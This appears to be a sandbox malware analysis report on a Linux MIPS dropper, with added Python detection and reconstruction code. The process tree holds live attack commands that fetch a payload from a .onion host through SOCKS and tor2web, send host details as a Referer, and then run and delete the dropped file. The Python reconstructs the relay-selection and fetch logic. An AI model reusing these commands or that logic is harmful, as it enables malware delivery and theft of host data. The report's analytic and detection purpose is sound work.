Analysis

  • max time kernel
    87s
  • max time network
    155s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags
    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    24/10/2024, 18:05

General

  • Target

    74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

  • Size

    1KB

  • MD5

    74accae8c7e0093939ab4e0cd1c2a7fd

  • SHA1

    ae3b26988c72634e3f0daeb6486332530ba58324

  • SHA256

    d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea

  • SHA512

    7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information 16 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 7 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.
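
The behaviours listed above can be turned into detection logic over a process log. The Python that follows is an added example, not part of the sandbox report or of the sample's own code: it reads constructed (pid, ppid, cmdline) records copied from the process tree, reconstructs curl's arguments (bundled short flags such as -4fsSLkA-, attached values such as -o./file and -m200, detached ones such as -x proxy), and flags DoH lookups, .onion downloads through a socks5h proxy, the tor2web fallback, external-IP lookups, and the chmod +x, execute, rm sequence on a dropped file. The Referer field names (external_ip, user, arch, hostname, digest) are this example's reading of the command order in the tree (checkip, whoami, uname -m, uname -n, md5sum), not a documented format, and IP_LOOKUP_HOSTS is an assumed list. The digest check is a fact worth knowing: d41d8cd98f00b204e9800998ecf8427e, the value in the third download attempt, is the MD5 of empty input.

```python
"""Detection pass over a process log, built from the behaviours listed in the
Signatures section. Added example, not part of the sandbox report; the log
lines below are constructed from the report's process tree."""
import hashlib
import os
import shlex

ONION = "ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd"
REF = "138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_"
# Constructed sample: (pid, ppid, cmdline) for children of bash (pid 707).
SAMPLE_LOG = [
    (725, 707, "chmod +x ./i"),
    (727, 707, "./i"),
    (728, 707, "rm -f i"),
    (733, 707, 'curl -4fsSLkA- -m200 "https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in"'),
    (755, 707, "curl -4fsSLk checkip.amazonaws.com"),
    (772, 707, f"curl -4fsSLkA- -m200 -x socks5h://:9050 {ONION}.onion/int.mips "
               f"-o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e{REF}680fff434a0b9c16e89d622a5bd1b890_"),
    (774, 707, f"curl -4fsSLkA- -m200 {ONION}.tor2web.in/int.mips "
               f"-o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e{REF}680fff434a0b9c16e89d622a5bd1b890_"),
    (779, 707, "chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222"),
    (780, 707, "./e8eb0a2cdf54c3ac6d6c2fd3f5796222"),
    (781, 707, "rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222"),
    (826, 707, f"curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 {ONION}.onion/int.mips "
               f"-o./4db8a69be99c4cf3f0388ff8c87b69b0 -e{REF}d41d8cd98f00b204e9800998ecf8427e_"),
]
IP_LOOKUP_HOSTS = {"checkip.amazonaws.com"}   # assumption: only the service seen here; extend as needed
CURL_OPTS_WITH_ARG = set("AeHmouxXd")         # short curl options that consume a value
CURL_KEEP = {"x": "proxy", "o": "output", "e": "referer", "A": "user_agent"}


def parse_curl(cmd):
    """Minimal curl argv parser: bundled short flags (-4fsSLkA-), attached values
    (-o./file, -m200) and detached ones (-x proxy). Long options are skipped."""
    argv = shlex.split(cmd) if isinstance(cmd, str) else list(cmd)
    out = {"url": None, "proxy": None, "output": None, "referer": None, "user_agent": None}
    i = 1
    while i < len(argv):
        tok, i = argv[i], i + 1
        if tok == "-" or not tok.startswith("-"):
            out["url"] = tok                  # the positional argument is the URL
            continue
        if tok.startswith("--"):
            continue
        for j, c in enumerate(tok[1:], start=1):
            if c in CURL_OPTS_WITH_ARG:       # value is the rest of the token, else the next token
                val = tok[j + 1:]
                if not val and i < len(argv):
                    val, i = argv[i], i + 1
                if c in CURL_KEEP:
                    out[CURL_KEEP[c]] = val
                break
    return out


def host_of(url):
    """Host part of a URL that may lack a scheme (curl accepts both forms)."""
    if "://" in url:
        url = url.split("://", 1)[1]
    return url.split("/", 1)[0]


def parse_referer_fingerprint(ref):
    """Split the '_'-joined host fingerprint sent as Referer. Field names are this
    example's interpretation of the command order seen in the tree."""
    parts = ref.rstrip("_").split("_")
    if len(parts) != 5:
        return None
    fp = dict(zip(["external_ip", "user", "arch", "hostname", "digest"], parts))
    fp["digest_is_empty_input"] = fp["digest"] == hashlib.md5(b"").hexdigest()
    return fp


def scan(log):
    """Return a list of findings (dicts with a 'rule' key) for (pid, ppid, cmd) records."""
    findings, marked_exec = [], {}       # marked_exec: (ppid, normalised path) -> chmod pid
    norm = os.path.normpath              # "./i" -> "i", so chmod/exec/rm spellings line up
    for pid, ppid, cmd in log:
        argv = shlex.split(cmd)
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        if prog == "curl":
            c = parse_curl(argv)
            url = c["url"] or ""
            host = host_of(url)
            if "/dns-query?name=" in url:
                findings.append({"rule": "doh_lookup", "pid": pid, "qname": url.split("name=", 1)[1]})
            if host in IP_LOOKUP_HOSTS:
                findings.append({"rule": "external_ip_lookup", "pid": pid, "host": host})
            if host.endswith(".onion") or (c["proxy"] or "").startswith("socks5h://"):
                findings.append({"rule": "tor_download", "pid": pid, "host": host, "proxy": c["proxy"],
                                 "output": c["output"],
                                 "fingerprint": parse_referer_fingerprint(c["referer"] or "")})
            elif ".tor2web." in host:
                findings.append({"rule": "tor2web_fallback", "pid": pid, "host": host, "output": c["output"]})
        elif prog == "chmod" and len(argv) >= 3 and "+x" in argv[1]:
            for p in argv[2:]:
                marked_exec[(ppid, norm(p))] = pid
        elif (ppid, norm(argv[0])) in marked_exec:
            findings.append({"rule": "exec_after_chmod", "pid": pid, "path": argv[0],
                             "chmod_pid": marked_exec[(ppid, norm(argv[0]))]})
        elif prog == "rm":
            for p in argv[1:]:
                if (ppid, norm(p)) in marked_exec:
                    findings.append({"rule": "dropped_file_deleted", "pid": pid, "path": p})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Run against the constructed records this yields nine findings: two exec-after-chmod pairs with their deletions, one DoH lookup, one external-IP lookup, one tor2web fallback and two .onion downloads, the first with an empty proxy host (socks5h://:9050) and the second with 65.108.216.128 and an empty-input digest.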

Processes

  • /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    1⤵
    PID:699
    • /bin/bash
      bash
      2⤵
      • Writes file to tmp directory
      PID:707
      • /usr/bin/cut
        cut -d: -f6
        3⤵
        PID:713
      • /usr/bin/id
        id -u
        3⤵
        • Reads runtime system information
        PID:715
      • /bin/grep
        grep x:0: /etc/passwd
        3⤵
        PID:712
      • /usr/bin/head
        head -n 1 /tmp/.X11-unix/01
        3⤵
        PID:721
      • /bin/ls
        ls /proc//status
        3⤵
        • Reads runtime system information
        PID:723
      • /bin/chmod
        chmod +x ./i
        3⤵
        • File and Directory Permissions Modification
        PID:725
      • /tmp/i
        ./i
        3⤵
        • Executes dropped EXE
        PID:727
      • /bin/rm
        rm -f i
        3⤵
        PID:728
      • /bin/grep
        grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
        3⤵
        PID:734
      • /usr/bin/tr
        tr " " "\\n"
        3⤵
        PID:735
      • /usr/bin/sort
        sort -uR
        3⤵
        PID:737
      • /bin/grep
        grep -Ev "[.]0"
        3⤵
        PID:736
      • /usr/bin/head
        head -n 1
        3⤵
        PID:738
      • /usr/bin/curl
        curl -4fsSLkA- -m200 "https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in"
        3⤵
        • Reads runtime system information
        PID:733
      • /bin/uname
        uname -m
        3⤵
        PID:747
      • /bin/date
        date
        3⤵
        PID:750
      • /usr/bin/md5sum
        md5sum
        3⤵
        PID:751
      • /usr/bin/cut
        cut -f1 -d-
        3⤵
        PID:752
      • /usr/bin/curl
        curl -4fsSLk checkip.amazonaws.com
        3⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:755
      • /usr/bin/whoami
        whoami
        3⤵
        PID:760
      • /bin/uname
        uname -m
        3⤵
        PID:761
      • /bin/uname
        uname -n
        3⤵
        PID:762
      • /sbin/ip
        ip a
        3⤵
        • System Network Configuration Discovery
        PID:764
      • /bin/grep
        grep "inet "
        3⤵
        PID:765
      • /usr/bin/md5sum
        md5sum
        3⤵
        PID:767
      • /usr/bin/awk
        awk "{print \$1}"
        3⤵
        • Reads runtime system information
        PID:768
      • /usr/bin/awk
        awk "{print \$2}"
        3⤵
        • Reads runtime system information
        PID:766
      • /usr/bin/base64
        base64 -w0
        3⤵
        PID:771
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:770
      • /usr/bin/curl
        curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_
        3⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:772
      • /usr/bin/curl
        curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_
        3⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:774
      • /bin/chmod
        chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
        3⤵
        • File and Directory Permissions Modification
        PID:779
      • /tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222
        ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
        3⤵
        PID:780
      • /bin/rm
        rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
        3⤵
        PID:781
      • /usr/bin/head
        head -n 1 /tmp/.X11-unix/01
        3⤵
        PID:782
      • /bin/ls
        ls /proc//status
        3⤵
        • Reads runtime system information
        PID:783
      • /bin/grep
        grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
        3⤵
        PID:788
      • /usr/bin/tr
        tr " " "\\n"
        3⤵
        PID:789
      • /usr/bin/sort
        sort -uR
        3⤵
        PID:791
      • /usr/bin/head
        head -n 1
        3⤵
        PID:792
      • /usr/bin/curl
        curl -4fsSLkA- -m200 "https://dns.twnic.tw/dns-query?name=relay.tor2socks.in"
        3⤵
        • Reads runtime system information
        PID:787
      • /bin/grep
        grep -Ev "[.]0"
        3⤵
        PID:790
      • /bin/uname
        uname -m
        3⤵
        PID:798
      • /bin/date
        date
        3⤵
        PID:801
      • /usr/bin/md5sum
        md5sum
        3⤵
        PID:802
      • /usr/bin/cut
        cut -f1 -d-
        3⤵
        PID:803
      • /usr/bin/curl
        curl -4fsSLk checkip.amazonaws.com
        3⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:806
      • /usr/bin/whoami
        whoami
        3⤵
        PID:811
      • /bin/uname
        uname -m
        3⤵
        PID:812
      • /bin/uname
        uname -n
        3⤵
        PID:814
      • /sbin/ip
        ip a
        3⤵
        • System Network Configuration Discovery
        PID:816
      • /bin/grep
        grep "inet "
        3⤵
        PID:817
      • /usr/bin/md5sum
        md5sum
        3⤵
        PID:819
      • /usr/bin/awk
        awk "{print \$2}"
        3⤵
        • Reads runtime system information
        PID:818
      • /usr/bin/awk
        awk "{print \$1}"
        3⤵
        • Reads runtime system information
        PID:820
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:823
      • /usr/bin/base64
        base64 -w0
        3⤵
        PID:824
      • /usr/bin/curl
        curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_
        3⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:826
    • /usr/bin/base64
      base64 -d
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:706
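
The pipeline that follows each DoH query in the tree (grep -oE for dotted quads, tr, sort -uR, grep -Ev "[.]0", head -n 1) picks the host for the socks5h proxy in the next curl. In the first round the proxy host came out empty (socks5h://:9050) and the script fell through to the tor2web.in gateway; in the third attempt, after the dns.twnic.tw query, it carried 65.108.216.128. The Python below is an added reconstruction of that selection logic, not the dropper's own code. The DoH responses are constructed here, since the report does not include network captures. It reproduces the empty-host proxy string when no address survives the filter, and shows a side effect of the "[.]0" filter that a practitioner would want to know about: any address with an octet beginning in 0 (10.0.5.7, 65.108.0.5) is discarded, not only x.y.z.0.

```python
"""Reconstruction of the relay-selection pipeline seen in the process tree:
grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b" | tr " " "\\n" | sort -uR | grep -Ev "[.]0" | head -n 1
Added example, not the dropper's code. DoH responses below are constructed."""
import json
import random
import re

IPV4_RE = re.compile(r"\b([0-9]{1,3}\.){3}[0-9]{1,3}\b")   # same pattern as the grep -oE in the tree
SOCKS_PORT = 9050                                          # port used in every -x socks5h:// seen
ONION = "ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd"

# Constructed responses in the JSON shape DoH resolvers return for ?name= queries.
DOH_OK = json.dumps({"Status": 0, "Answer": [
    {"name": "relay.tor2socks.in", "type": 1, "TTL": 300, "data": "65.108.216.128"},
    {"name": "relay.tor2socks.in", "type": 1, "TTL": 300, "data": "65.108.216.128"},  # duplicate: sort -u collapses it
    {"name": "relay.tor2socks.in", "type": 1, "TTL": 300, "data": "10.0.5.7"},        # valid, but grep -Ev "[.]0" drops it
]})
DOH_EMPTY = json.dumps({"Status": 3, "Comment": "no A records"})   # nothing to pick: head -n 1 yields ""


def extract_ipv4(text):
    """grep -oE ... | tr " " "\\n": every dotted-quad-looking token, in order of appearance.
    The pattern does no range check, so 999.999.999.999 would pass it too."""
    return [m.group(0) for m in IPV4_RE.finditer(text)]


def candidate_relays(text):
    """sort -u | grep -Ev "[.]0": unique tokens minus any containing '.0'. Sorted for determinism."""
    return sorted({ip for ip in extract_ipv4(text) if ".0" not in ip})


def pick_relay(text, rng=random):
    """sort -R | head -n 1: one randomly chosen candidate, or "" when none survive."""
    cands = candidate_relays(text)
    return rng.choice(cands) if cands else ""


def proxy_url(relay):
    """The -x value handed to curl; an empty relay reproduces socks5h://:9050 from the first attempt."""
    return f"socks5h://{relay}:{SOCKS_PORT}"


def fetch_attempts(relay, path="/int.mips"):
    """Download order observed in the tree: the .onion through the SOCKS relay,
    then the same host through the tor2web.in clearnet gateway with no proxy."""
    return [(proxy_url(relay), f"{ONION}.onion{path}"),
            (None, f"{ONION}.tor2web.in{path}")]


if __name__ == "__main__":
    for resp in (DOH_OK, DOH_EMPTY):
        relay = pick_relay(resp)
        print(repr(relay), fetch_attempts(relay))
```

The script's own filter is the weak point for an analyst replaying it: a resolver that returns only addresses with a zero-leading octet leaves the proxy host blank, curl then fails on the .onion URL, and the tor2web gateway request is what actually reaches the network.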

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/i

  • Filesize

    5B

  • MD5

    f4b524261fce06c1fbd10b4681ad0b97

  • SHA1

    c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d

  • SHA256

    9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031

  • SHA512

    ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449